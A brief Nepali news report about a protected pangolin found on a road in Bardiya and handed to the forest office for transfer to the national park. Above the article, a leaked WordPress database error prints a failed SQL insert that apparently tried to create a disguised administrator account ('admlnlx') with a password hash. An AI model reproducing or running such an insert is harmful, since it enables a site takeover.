WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSTgJicPNmficYejDXXNFoB9RXYXrD1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 21:20:21', '', 'admlnlx', 'admlnlx')
बर्दिया, पुस ७–
संरक्षित वन्यजन्तु सालक बर्दियामा बुधबार फेला परेको छ । ताराताल सानोश्री नगरपालिका–७ गङ्गावस्तीमा उक्त सालक फेला परेको हो ।
एक्कासि बाटोमा सालक देखिएपछि स्थानीयले जिल्ला वन कार्यालयमा जानकारी गराएपछि वनको टोलीले सालकलाई सुरक्षित रुपमा कार्यालयमा ल्याएको जिल्ला वन प्रमुख बलिराम पण्डितले बताउनुभयो । सालकको अवैध कारोबारसमेत हुने गरेको छ । सालकको अवैधरुपमा सिकार, कारोबार गर्नैलाई पाँचदेखि १५ वर्षसम्म कैद वा रु ५० हजारदेखि एक लाखसम्म दण्ड जरिबाना हुने बताउनुभयो ।
फेला परेको सालकलाई बर्दिया राष्ट्रिय निकुञ्जमा पठाइने जिल्ला वन कार्यालयले जनाएको छ ।